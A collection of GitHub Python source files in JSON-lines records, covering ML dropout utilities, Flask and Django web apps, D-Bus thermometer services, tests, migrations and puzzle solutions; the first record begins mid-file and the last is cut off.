proba_field_name = \"dropout_rate\" if \"flair\" in str(type(layer)) else \"p\"\r\n module_name = list(model._modules.items())[i][0]\r\n layer_name = layer._get_name()\r\n if layer_name in substitution_dict.keys():\r\n model._modules[module_name] = substitution_dict[layer_name](\r\n p=getattr(layer, proba_field_name), activate=False\r\n )\r\n else:\r\n convert_to_mc_dropout(model=layer, substitution_dict=substitution_dict)\r\n\r\n\r\ndef activate_mc_dropout(\r\n model: torch.nn.Module, activate: bool, random: float = 0.0, verbose: bool = False\r\n):\r\n for layer in model.children():\r\n if isinstance(layer, DropoutMC):\r\n layer.activate = activate\r\n if activate and random:\r\n layer.p = random\r\n if not activate:\r\n layer.p = layer.p_init\r\n else:\r\n activate_mc_dropout(\r\n model=layer, activate=activate, random=random, verbose=verbose\r\n )\r\n\r\ndef convert_dropouts(model, dropout_type='MC'):\r\n if dropout_type == 'MC':\r\n dropout_ctor = lambda p, activate: DropoutMC(\r\n p=0.1, activate=False\r\n )\r\n elif dropout_type == \"DPP\":\r\n\r\n def dropout_ctor(p, activate):\r\n return DropoutDPP(\r\n p=p,\r\n activate=activate,\r\n max_n=100,\r\n max_frac=0.8,\r\n mask_name=\"dpp\",\r\n )\r\n\r\n else:\r\n raise ValueError(f\"Wrong dropout type: {ue_args.dropout_type}\")\r\n\r\n # set_last_dropout(model, dropout_ctor(p=ue_args.inference_prob, activate=False))\r\n if dropout_type == \"DPP\":\r\n model.dropout = dropout_ctor(p=0.1, activate=False)\r\n else:\r\n convert_to_mc_dropout(model, {\"Dropout\": dropout_ctor})\r\n # model.dropout = DropoutDPP(\r\n # p=0.1,\r\n # activate=False,\r\n # max_n=100,\r\n # max_frac=0.8,\r\n # mask_name=\"dpp\",\r\n # )\r\n","repo_name":"uclanlp/AdvExDetection-ADDMU","sub_path":"utils/dropout_mc.py","file_name":"dropout_mc.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"10014156558","text":"from . import interface_repo\nfrom . import node\nfrom . import error\nfrom . import names\nfrom . import _util\nfrom .thermometer import Thermometer_Client, TemperatureHistory_Client\n\n\nclass ThermometerCenter_Client:\n def __init__(self, bus):\n self.__bus = bus\n self.__iface = _util.get_iface(\n bus=bus,\n busname=names.Bus.THERMOMETERS,\n path=names.ThermometerPaths.CENTER,\n iface=interface_repo.THERMOMETERCENTER)\n\n @error.maperror\n def all_names(self):\n return self.__iface.all_names()\n\n @error.maperror\n def get_thermometer(self, name):\n return Thermometer_Client(proxy=_util.get_iface(\n bus=self.__bus,\n busname=names.Bus.THERMOMETERS,\n path=names.ThermometerPaths.THERMOMETER(name),\n iface=interface_repo.THERMOMETER))\n\n @error.maperror\n def get_history(self, name):\n return TemperatureHistory_Client(proxy=_util.get_iface(\n bus=self.__bus,\n busname=names.Bus.THERMOMETERS,\n path=names.ThermometerPaths.THERMOMETER(name),\n iface=interface_repo.TEMPERATUREHISTORY))\n\n @error.maperror\n def force_update(self, timestamp):\n for name in self.all_names():\n self.get_thermometer(name).force_update(timestamp)\n\n\n@node.Definition(interfaces=interface_repo.get(\n interface_repo.THERMOMETERCENTER,\n interface_repo.POLLABLE))\nclass ThermometerCenter_Server:\n '''D-Bus object that ... well, sort of ... maintains thermometer\n objects.\n\n '''\n def __init__(self, objects):\n self.__objects = objects\n\n def all_names(self):\n ''':returns: list strings; names of maintained thermometers.\n\n '''\n return [o.get_name() for o in self.__objects]\n\n def poll(self, timestamp):\n '''Polls all maintained thermometers.\n\n '''\n for o in self.__objects:\n o.poll(timestamp)\n","repo_name":"jfasch/openheating","sub_path":"openheating/dbus/thermometer_center.py","file_name":"thermometer_center.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"81"} +{"seq_id":"31238565902","text":"# This script is modifed from https://github.com/AndreyGuzhov/AudioCLIP/blob/master/demo/AudioCLIP.ipynb\n\n# Modify this PATH variable if you install ESC-50 somewhere else\nPATH = '../data/esc-50/'\n\nimport sys\nprint(sys.version)\nimport os\n\nimport librosa\nimport numpy as np\nfrom tqdm import tqdm\n\nimport torch\n\n# sys.path.append(os.path.abspath(f'{os.getcwd()}/..'))\n\nimport csv\nfrom model import AudioCLIP\nfrom utils.transforms import ToTensor1D\n\ntorch.set_grad_enabled(False)\n\nMODEL_FILENAME = 'AudioCLIP-Partial-Training.pt'\n# derived from ESResNeXt\nSAMPLE_RATE = 44100\n\naclp = AudioCLIP(pretrained=f'{PATH}/{MODEL_FILENAME}')\naudio_transforms = ToTensor1D()\n\n\nESC_path = f\"{PATH}/ESC-50-master\"\n\n\ndef read_csv(filename):\n with open(filename, 'r') as f:\n reader = csv.reader(f)\n return list(reader)\n\nmetadata = read_csv(f'{ESC_path}/meta/esc50.csv')\n\nsave_path = f'{PATH}/features.pt'\nFILE_PATH_INDEX = 0\nFOLD_INDEX = 1\nCLASS_INDEX = 2\nCLASSNAME_INDEX = 3\nID_INDEX = 5\n\nif not os.path.exists(save_path):\n track_list = {\n i: list()\n for i in range(5)\n }\n meta = {\n i: list()\n for i in range(5)\n }\n for idx, line in tqdm(enumerate(metadata[1:])):\n path_to_audio = f'{ESC_path}/audio/{line[FILE_PATH_INDEX]}'\n fold_index = int(line[FOLD_INDEX]) - 1\n track, _ = librosa.load(path_to_audio, sr=SAMPLE_RATE, dtype=np.float32)\n if track.shape[0] > 220500:\n track = track[:220500]\n else:\n track = np.pad(track, (0, 220500 - track.shape[0]), 'constant')\n track_list[fold_index].append(track)\n \n meta[fold_index].append(\n {\n 'class': int(line[CLASS_INDEX]),\n 'classname' : line[CLASSNAME_INDEX],\n 'path': line[FILE_PATH_INDEX]\n }\n )\n\n esc50_dict = {\n i: dict()\n for i in range(5)\n }\n batch_size = 10\n for fold_index in range(5):\n # chunk track_list into batches\n tracks_allfold = [track_list[fold_index][i:i + batch_size] for i in range(0, len(track_list[fold_index]), batch_size)]\n \n final_audio_stacked = None\n for tracks in tqdm(tracks_allfold):\n audio_stacked = torch.stack([audio_transforms(track.reshape(1, -1)) for track in tracks])\n ((audio_features_stacked, _, _), _), _ = aclp(audio=audio_stacked)\n audio_features_stacked = audio_features_stacked / torch.linalg.norm(audio_features_stacked, dim=-1, keepdim=True)\n\n if final_audio_stacked is None:\n final_audio_stacked = audio_features_stacked\n else:\n final_audio_stacked = torch.cat((final_audio_stacked, audio_features_stacked), dim=0)\n assert len(meta[fold_index]) == final_audio_stacked.shape[0]\n esc50_dict[fold_index]['features'] = final_audio_stacked\n esc50_dict[fold_index]['labels'] = torch.Tensor([d['class'] for d in meta[fold_index]]).long()\n esc50_dict[fold_index]['labelnames'] = [d['classname'] for d in meta[fold_index]]\n esc50_dict[fold_index]['paths'] = [d['path'] for d in meta[fold_index]]\n torch.save(esc50_dict, save_path)\nelse:\n esc50_dict = torch.load(save_path)\n","repo_name":"linzhiqiu/cross_modal_adaptation","sub_path":"audioclip/audio_features.py","file_name":"audio_features.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","stars":188,"dataset":"github-code","pt":"81"} +{"seq_id":"13746889494","text":"from django.urls import include, path\nfrom .import views \n\nurlpatterns = [\n path('', views.Acceuil, name=\"acceuil\"),\n path('/tableauBord', views.Dashboard, name=\"dashboard\"),\n path('/assureTable', views.TableAssure, name=\"tablesAssure\"),\n path('/ayantDroitTable', views.TableAyantDroit, name=\"tableAyantDroit\"),\n path('/CampagnieAssuranceTable', views.TableCampagnieAssurance, name=\"tableCampagnieAssurance\"),\n path('/commandeTable', views.TableCommande, name=\"tableCommande\"),\n path('/livraisonTable', views.TableLivraison, name=\"tableLivraison\"),\n path('/livreurTable', views.TableLivreur, name=\"tableLivreur\"),\n path('/medicamentTable', views.TableMedicament, name=\"tableMadicament\"),\n path('/societeTable', views.TableSociete, name=\"tableSociete\"),\n path('soucheTable', views.TableSouche, name=\"tableSouche\"),\n path('/vendeurTable', views.TableVendeur, name=\"tableVendeur\"),\n path('/assureFiche', views.FicheAssure, name=\"ficheAssure\"),\n path('/ayantDroitFiche', views.FicheAyantDroit, name=\"ficheAyantDroit\"),\n path('/CampagnieAssuranceFiche', views.FicheCampagnieAssurance, name=\"ficheCampagnieAssurance\"),\n path('/commandeFiche', views.FicheCommande, name=\"ficheCommande\"),\n path('/livraisonFiche', views.FicheLivraison, name=\"ficheLivraison\"),\n path('/livreurFiche', views.FicheLivreur, name=\"ficheLivreur\"),\n path('/medicamentFiche', views.FicheMedicament, name=\"ficheMedicament\"),\n path('/societeFiche', views.FicheSociete, name=\"ficheSociete\"),\n path('/soucheFiche', views.FicheSouche, name=\"ficheSouche\"),\n path('/vendeurFiche', views.FicheVendeur, name=\"ficheVendeur\"),\n path('/incriptionFiche', views.FicheInscription, name=\"ficheInscription\"),\n path('/connexionFiche', views.FicheConnexion, name=\"ficheConnexion\"),\n]\n\n","repo_name":"Ominngsa/MAVRE_LICENCE","sub_path":"SOUTENANCE_MAVRE/utilisateurs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8041012137","text":"from flask import Flask\nfrom flask_login import LoginManager\nfrom flask_migrate import Migrate\nfrom flask_wtf.csrf import CSRFProtect\n\nfrom config import Config\nfrom models import db\n\nfrom blueprints import guest_bp, user_bp\n\n\ndef create_app():\n app = Flask(__name__)\n app.config.from_object(Config)\n\n login_manager = LoginManager()\n login_manager.login_view = 'guest_views.login'\n login_manager.init_app(app)\n\n csrf = CSRFProtect()\n csrf.init_app(app)\n\n db.init_app(app)\n\n migrate = Migrate(app, db)\n migrate.init_app(app, db)\n\n app.register_blueprint(guest_bp.guest_blueprint)\n app.register_blueprint(user_bp.user_blueprint)\n\n @login_manager.user_loader\n def load_user(user_id):\n from models import User\n if User.query.get(user_id):\n return User.query.get(user_id)\n else:\n return None\n\n return app\n\n\napp_instance = create_app()\n\nif __name__ == '__main__':\n app_instance.run(threaded=True)\n","repo_name":"ghandylan/flask-notes","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34916331386","text":"\"\"\"empty message\n\nRevision ID: d0fe5a2ca6a2\nRevises: 3af2cdf261e9\nCreate Date: 2021-12-09 20:20:40.244136\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"d0fe5a2ca6a2\"\ndown_revision = \"3af2cdf261e9\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table(\"albums_roles\") as batch_op:\n batch_op.create_unique_constraint(\"album_role_unique\", [\"album_id\", \"role_id\"])\n with op.batch_alter_table(\"users_roles\") as batch_op:\n batch_op.create_unique_constraint(\"user_role_unique\", [\"user_id\", \"role_id\"])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, \"users_roles\", type_=\"unique\")\n op.drop_constraint(None, \"albums_roles\", type_=\"unique\")\n # ### end Alembic commands ###\n","repo_name":"akleiw/flaskgallery","sub_path":"migrations/versions/d0fe5a2ca6a2_.py","file_name":"d0fe5a2ca6a2_.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8143775426","text":"from unittest import TestCase, main as unittest_main, mock\nfrom app import app\nfrom bson.objectid import ObjectId\n\n\nsample_item_id = ObjectId('5d55cffc4a3d4031f42827a3')\nsample_item = {\n 'name': 'Spaghetti',\n 'image': 'https://thecozyapron.com/wp-content/uploads/2019/05/spaghetti-bolognese_thecozyapron_1.jpg',\n 'price': '10',\n \"description and quantity\":'Good spaghetti and 2 bowls'\n}\nsample_form_data = {\n 'name': sample_item['name'],\n 'image': sample_item['image'],\n 'price': sample_item['price'],\n 'description and quantity': sample_item['description']\n}\n\n\nclass listingsTests(TestCase):\n \"\"\"Flask tests.\"\"\"\n\n def setUp(self):\n \"\"\"Stuff to do before every test.\"\"\"\n\n # Get the Flask test client\n self.client = app.test_client()\n\n # Show Flask errors that happen during tests\n app.config['TESTING'] = True\n\n def test_index(self):\n \"\"\"Test the pantry homepage.\"\"\"\n result = self.client.get('/')\n self.assertEqual(result.status, '200 OK')\n self.assertIn(b'listing', result.data)\n\n def test_new(self):\n \"\"\"Test the new listing creation page.\"\"\"\n result = self.client.get('/pantry/new')\n self.assertEqual(result.status, '200 OK')\n self.assertIn(b'New item', result.data)\n\n @mock.patch('pymongo.collection.Collection.find_one')\n def test_show_item(self, mock_find):\n \"\"\"Test showing a single listing.\"\"\"\n mock_find.return_value = sample_item\n\n result = self.client.get(f'/pantry/{sample_item_id}')\n self.assertEqual(result.status, '200 OK')\n self.assertIn(b'Item', result.data)\n\n @mock.patch('pymongo.collection.Collection.find_one')\n def test_edit_item(self, mock_find):\n \"\"\"Test editing a single item.\"\"\"\n mock_find.return_value = sample_item\n\n result = self.client.get(f'/pantry/{sample_item_id}/edit')\n self.assertEqual(result.status, '200 OK')\n self.assertIn(b'Spaghetti', result.data)\n\n @mock.patch('pymongo.collection.Collection.insert_one')\n def test_submit_item(self, mock_insert):\n \"\"\"Test submitting a new item.\"\"\"\n result = self.client.post('/pantry/new', data=sample_form_data)\n\n # After submitting, should redirect to that item's page\n self.assertEqual(result.status, '302 FOUND')\n mock_insert.assert_called_with(sample_item)\n\n @mock.patch('pymongo.collection.Collection.update_one')\n def test_update_item(self, mock_update):\n result = self.client.post(f'/pantry/{sample_item_id}', data=sample_form_data)\n\n self.assertEqual(result.status, '302 FOUND')\n mock_update.assert_called_with({'_id': sample_item_id}, {'$set': sample_item})\n @mock.patch('pymongo.collection.Collection.delete_one')\n def test_delete_item(self, mock_delete):\n form_data = {'_method': 'DELETE'}\n result = self.client.post(f'/pantry/{sample_item_id}/delete', data=form_data)\n self.assertEqual(result.status, '302 FOUND')\n mock_delete.assert_called_with({'_id': sample_item_id})\nif __name__ == '__main__':\n unittest_main()","repo_name":"franklin-phan/Pantry-App","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"23817229901","text":"from time import time\nt0 = time()\n\na = [5,1,9,18,13,8,0]\n\ncache = {}\n\ndef add_to_cache(k, v):\n if k not in cache:\n cache[k] = [-1, v]\n return\n cache[k][0] = cache[k][1]\n cache[k][1] = v\n\nfor i, val in enumerate(a):\n add_to_cache(val, i + 1)\n\ncur = a[-1]\nfor i in range(len(a), 2020):\n add_to_cache(cur, i)\n prev = cache[cur][0]\n cur = 0 if prev == -1 else i - prev\n\nprint(cur)\n\nprint(f'Time: {(time()-t0) * 1000}ms')\n","repo_name":"JonathanBouwer/AdventOfCode","sub_path":"2020/15-a.py","file_name":"15-a.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21761712126","text":"class Solution:\n def countSubIslands(grid1, grid2) -> int:\n #dfs on grid2 when finding a 1.\n #if a 1 on grid2 is 0 on grid1, break and don't add to count\n visited = set()\n m = len(grid2)\n n = len(grid2[0])\n def neighbors(i,j):\n neighbs = []\n if m - 1 > i and grid2[i+1][j] == 1:\n neighbs.append((i+1,j))\n if i > 0 and grid2[i-1][j] == 1:\n neighbs.append((i-1,j))\n if j < n - 1 and grid2[i][j+1] == 1:\n neighbs.append((i,j+1))\n if j > 0 and grid2[i][j-1] == 1:\n neighbs.append((i,j-1))\n return neighbs\n\n def isSubIsland(i,j):\n res = True\n stack = [(i,j)]\n while stack:\n coords = stack.pop()\n if coords not in visited:\n visited.add(coords)\n stack.extend(neighbors(*coords))\n if grid1[coords[0]][coords[1]] == 0:\n res = False\n return res\n\n count = 0\n\n for i in range(m):\n for j in range(n):\n if grid2[i][j] == 0:\n continue\n if (i,j) not in visited and isSubIsland(i,j):\n print(i,j)\n count += 1\n return count\ngrid1=[[1,0,1,0,1],[1,1,1,1,1],[0,0,0,0,0],[1,1,1,1,1],[1,0,1,0,1]]\ngrid2=[[0,0,0,0,0],[1,1,1,1,1],[0,1,0,1,0],[0,1,0,1,0],[1,0,0,0,1]]\nprint(Solution.countSubIslands(grid1,grid2))\n","repo_name":"jrchew15/leetcode","sub_path":"subIsland.py","file_name":"subIsland.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41695631634","text":"#!/usr/bin/python3\n\"\"\"\nIn an election, the i-th vote was cast for persons[i] at time times[i].\n\nNow, we would like to implement the following query function:\nTopVotedCandidate.q(int t) will return the number of the person that was leading\nthe election at time t.\n\nVotes cast at time t will count towards our query. In the case of a tie, the\nmost recent vote (among tied candidates) wins.\n\nExample 1:\n\nInput: [\"TopVotedCandidate\",\"q\",\"q\",\"q\",\"q\",\"q\",\"q\"], [[[0,1,1,0,0,1,0],\n[0,5,10,15,20,25,30]],[3],[12],[25],[15],[24],[8]]\nOutput: [null,0,1,1,0,0,1]\nExplanation:\nAt time 3, the votes are [0], and 0 is leading.\nAt time 12, the votes are [0,1,1], and 1 is leading.\nAt time 25, the votes are [0,1,1,0,0,1], and 1 is leading (as ties go to the\nmost recent vote.)\nThis continues for 3 more queries at time 15, 24, and 8.\n\nNote:\n\n1 <= persons.length = times.length <= 5000\n0 <= persons[i] <= persons.length\ntimes is a strictly increasing array with all elements in [0, 10^9].\nTopVotedCandidate.q is called at most 10000 times per test case.\nTopVotedCandidate.q(int t) is always called with t >= times[0].\n\"\"\"\nfrom typing import List\nfrom collections import defaultdict\nimport bisect\n\n\nclass TopVotedCandidate:\n def __init__(self, persons: List[int], times: List[int]):\n \"\"\"\n Running top vote\n Need to maintain list\n\n but time is too large to enumerate. Cannot have direct access, then\n query is binary search\n \"\"\"\n self.maxes = [] # [(t, i)] at time t\n counter = defaultdict(int)\n tp = sorted(zip(times, persons))\n for t, p in tp:\n counter[p] += 1\n if not self.maxes or counter[self.maxes[-1][1]] <= counter[p]:\n self.maxes.append((t, p))\n\n def q(self, t: int) -> int:\n i = bisect.bisect(self.maxes, (t, 0))\n # equal\n if i < len(self.maxes) and self.maxes[i][0] == t:\n return self.maxes[i][1]\n\n # smaller\n i -= 1\n return self.maxes[i][1]\n\n\n# Your TopVotedCandidate object will be instantiated and called as such:\n# obj = TopVotedCandidate(persons, times)\n# param_1 = obj.q(t)\n","repo_name":"algorhythms/LeetCode","sub_path":"911 Online Election.py","file_name":"911 Online Election.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":843,"dataset":"github-code","pt":"81"} +{"seq_id":"9637037385","text":"#Diseñe un algoritmo que muestre en pantalla su nombre, sexo, edad, salario (incluyendo centavos) y si tiene o no vehículo de transporte.\n\nnombre = 'Harold Yulian Sanchez Alcantar'\nsexo = 'Masculino'\nedad = 24\nsalario = 1_020_000\nvehiculo = False\ntengoVehiculo = (\"No tengo vehiculo\", \"Tengo vehiculo\")[vehiculo]\n\nprint(f\"Nombre: {nombre}\\n\"\\\n f\"Sexo: {sexo}\\n\" \\\n f\"Edad: {edad}\\n\" \\\n f\"Salario: {salario}\\n\"\\\n f\"Vehiculo: {tengoVehiculo}\")\n\n","repo_name":"Smendoza120/Notas-sena","sub_path":"Programacion/Talleres/3)Apropiación/Solucion/Python/1)Primer punto/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29728426803","text":"import os\nimport sys\nimport time\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../../../')))\n\nfrom sphero_sdk import SpheroRvrObserver\n\nrvr = SpheroRvrObserver()\n\n# Flag used to indicate that calibration is complete\ncalibration_completed = False\n\n\n# Handler for completion of calibration\ndef on_calibration_complete_notify_handler(response):\n global calibration_completed\n\n print('Calibration complete, response:', response)\n calibration_completed = True\n\n\ndef main():\n \"\"\" This program demonstrates the magnetometer calibration to find north.\n \"\"\"\n\n try:\n global calibration_completed\n\n rvr.wake()\n\n # Give RVR time to wake up\n time.sleep(2)\n\n # Register for the async on completion of calibration\n rvr.on_magnetometer_calibration_complete_notify(handler=on_calibration_complete_notify_handler)\n\n # Begin calibration\n print('Begin magnetometer calibration to find North...')\n rvr.magnetometer_calibrate_to_north()\n\n # Wait to complete the calibration. Note: In a real project, a timeout mechanism\n # should be here to prevent the script from getting caught in an infinite loop\n while not calibration_completed:\n time.sleep(0)\n\n except KeyboardInterrupt:\n print('\\nProgram terminated with keyboard interrupt.')\n\n finally:\n rvr.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"YutaSuzukiGARI/mirai_FY20","sub_path":"getting_started/observer/magentometer/magnetometer_calibrate_to_north.py","file_name":"magnetometer_calibrate_to_north.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30780276153","text":"from datetime import datetime\n\nfrom odoo.exceptions import ValidationError\n\nfrom odoo.addons.component.tests.common import SavepointComponentCase\n\n\nclass TestResPartner(SavepointComponentCase):\n @classmethod\n def setUpClass(cls):\n super(TestResPartner, cls).setUpClass()\n cls.env = cls.env(context=dict(cls.env.context, tracking_disable=True))\n cls.unique_email = datetime.now().isoformat() + \"@test.com\"\n\n def test_unique_email_partner(self):\n self.assertFalse(self.env[\"res.partner\"]._is_partner_duplicate_prevented())\n partner_1 = self.env[\"res.partner\"].create(\n {\"email\": self.unique_email, \"name\": \"test partner\"}\n )\n # by default we can create partner with same email\n partner_2 = self.env[\"res.partner\"].create(\n {\"email\": self.unique_email, \"name\": \"test partner 2\"}\n )\n self.env[\"ir.config_parameter\"].create(\n {\"key\": \"shopinvader.no_partner_duplicate\", \"value\": \"True\"}\n )\n self.assertTrue(self.env[\"res.partner\"]._is_partner_duplicate_prevented())\n # once you've changed the config to dispable duplicate partner\n # it's no more possible to create a partner with the same email\n with self.assertRaises(ValidationError), self.cr.savepoint():\n self.env[\"res.partner\"].create(\n {\"email\": self.unique_email, \"name\": \"test partner 3\"}\n )\n\n # unicity constrains is only applicable on active records\n partners = partner_1 | partner_2\n partners.write({\"active\": False})\n self.env[\"res.partner\"].create(\n {\"email\": self.unique_email, \"name\": \"test partner 3\"}\n )\n","repo_name":"shopinvader/odoo-shopinvader","sub_path":"shopinvader/tests/test_res_partner.py","file_name":"test_res_partner.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"81"} +{"seq_id":"18871729545","text":"import os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nSECRET_KEY = '%d%o=b7fypwo(y03h0)1p06@4k_)#hbaccx_=@crof9%*ra+a!'\nDEBUG = True\nALLOWED_HOSTS = ['*']\n\nINSTALLED_APPS = (\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'app'\n )\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n )\n\nROOT_URLCONF = 'django_reactjs.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n ]\n\nWSGI_APPLICATION = 'django_reactjs.wsgi.application'\n\nDATABASES = {}\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nSTATIC_URL = '/static/'\n\n# Webpack configuration\nSTATICFILES_DIRS = ( os.path.join(BASE_DIR, 'frontend'), )\nWEBPACK_LOADER = {\n 'DEFAULT': {\n 'BUNDLE_DIR_NAME': 'bundles/',\n 'STATS_FILE': os.path.join(BASE_DIR, './.webpack/webpack-stats-local.json')\n }\n}\n\nINSTALLED_APPS += ( 'webpack_loader', )\n\nif not DEBUG:\n WEBPACK_LOADER.update({\n 'DEFAULT' : {\n 'BUNDLE_DIR_NAME': 'dist/',\n 'STATS_FILE': os.path.join(BASE_DIR, './.webpack/webpack-stats-prod.json')\n }\n })","repo_name":"rgonzalezramos/django-webpack-react-template","sub_path":"django_reactjs/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"71959742345","text":"# -*- coding: utf-8 -*-\n# !/usr/bin/python\n\nfrom flask import current_app, request\nfrom datetime import datetime\nfrom os import walk\nfrom werkzeug.utils import cached_property\nimport csv\nimport re\n\n\ntruly = lambda expr: expr is True\nfalsely = lambda expr: expr is False\nis_none = lambda expr: expr is None\nis_empty = lambda expr: expr == ''\nnone_or_empty = lambda obj: is_empty(obj) or is_none(obj)\n\n\nclass Archive(object):\n title = ''\n count = 0\n\n def __init__(self, **kwargs):\n self.__dict__.__init__(**kwargs)\n\n @property\n def posts(self):\n return [p for p in current_app.site.posts if (('%s-%s' % (p.published.year, p.published.month)) == self.title)]\n\n\ndef _extract_local(terms):\n if terms == '' or (terms is None):\n return ''\n\n results = re.match('^[a-z]{2}-[a-z]{2}', terms.lower())\n if results is not None:\n return results.group(0)\n else:\n ''\n\n\ndef fix_name(n):\n 'Fixes a string to be nicer (usable) variable names.'\n return n.replace(' ', '_').replace('.', '_')\n\n\ndef unicode_csv_reader(utf8_data, dialect=csv.excel, **kwargs):\n csv_reader = csv.reader(utf8_data, dialect=dialect, **kwargs)\n for row in csv_reader:\n yield [unicode(cell, 'utf-8') for cell in row]\n\n\ndef read_csv(csv_file):\n from_csv_line = lambda l, h: dict(zip(h, l))\n iter = unicode_csv_reader(csv_file).__iter__()\n headers = map(fix_name, iter.next())\n return [from_csv_line(i, headers) for i in iter]\n\n\nclass Site(object):\n _data = None\n lang = ''\n\n def __init__(self, **kwargs):\n self.__dict__.__init__(**kwargs)\n\n def menus(self, search_path=''):\n \"\"\"Get all page in the site\n \"\"\"\n # patterns = search_path.split('/')\n # if len(patterns) == 1:\n _locale = _extract_local(search_path)\n if _locale is None:\n _locale = ''\n\n # current_app.logger.info(_locale)\n\n return sorted([sp for sp in [p for p in current_app.pages if p._has_title and p._top and p._locale == _locale]],\n key=lambda sp: sp._id)\n # else:\n # return self.query('/'.join(patterns[:1]))\n\n def get_pages_path(self, context_path=\"\"):\n if is_empty(context_path) or is_none(context_path):\n return current_app.pages.get('index')\n else:\n segments = context_path.split('/')\n _path = ''\n results = []\n\n for _partial in segments:\n if _path == '':\n _path = _partial\n else:\n _path = _path + '/' + _partial\n if _path != context_path:\n results.append(current_app.pages.get(_path))\n return results\n\n def locale_posts(self, locale=''):\n return (p for p in self.posts if p._locale == locale)\n\n def query(self, search_path, all=False, sort='id'):\n \"\"\"Get post in specified collation path\n \"\"\"\n posts = (p for p in current_app.pages if p._has_title and p.path.startswith(search_path) and p._is_not_post)\n if not all:\n posts = [p for p in posts if\n (len(p.path[len(search_path) + 1:].split('/')) == 1) and (p.path != search_path)]\n\n return sorted(posts, key=lambda p: p.meta.get(sort, 0))\n\n def tagged(self, tag, locale=''):\n return (p for p in current_app.pages if\n p._has_tags and p._has_title and (tag in p._tags) and p._locale == locale)\n\n @property\n def pages(self):\n \"\"\"Get all page in the site\n \"\"\"\n _pages = (p for p in current_app.pages if p._has_title and p._is_post == False)\n return sorted(_pages, key=lambda p: p._id)\n\n @property\n def posts(self):\n \"\"\" Get all posts in the site\n \"\"\"\n _posts = (p for p in current_app.pages if p._has_title and p._is_post)\n return sorted(_posts, reverse=True, key=lambda p: p.published)\n\n @cached_property\n def data(self):\n \"\"\" Auto load the data files (`/data` folder) into dict\n :return:\n \"\"\"\n from os import path\n import json\n import yaml\n import logging\n\n # if self._data is not None:\n # return self._data\n\n class FriendlyDict(dict):\n def __getattr__(self, item):\n return self.get(item, None)\n\n def __getitem__(self, name):\n return self.get(name, None)\n\n self._data = FriendlyDict()\n data_path = path.join(current_app.path, 'data')\n\n # Define data file loaders\n _yml_loader = lambda p, n, f: p.update({n: yaml.load(f.read())})\n _csv_loader = lambda p, n, f: p.update({n: read_csv(f)})\n\n _loaders_ = {\n '.json': lambda p, n, f: p.update({n: json.load(f)}),\n '.yml': _yml_loader,\n '.yaml': _yml_loader,\n '.csv': _csv_loader\n }\n\n logging.getLogger()\n\n def load_data_objects(parent, dst_path):\n for root, dirs, files in walk(dst_path):\n\n def __load_dirs__(d):\n parent.update({d: FriendlyDict()})\n load_data_objects(parent.get(d), path.join(root, d))\n\n def __load_files__(f):\n file_name = path.join(root, f)\n ext = path.splitext(file_name)[1]\n\n try:\n with open(file_name) as file:\n obj_name = path.basename(path.splitext(file_name)[0])\n (_loaders_.get(ext, None) is not None) and _loaders_.get(ext)(parent, obj_name, file)\n except Exception as e:\n logging.error(e.message)\n finally:\n pass\n\n [__load_dirs__(d) for d in dirs 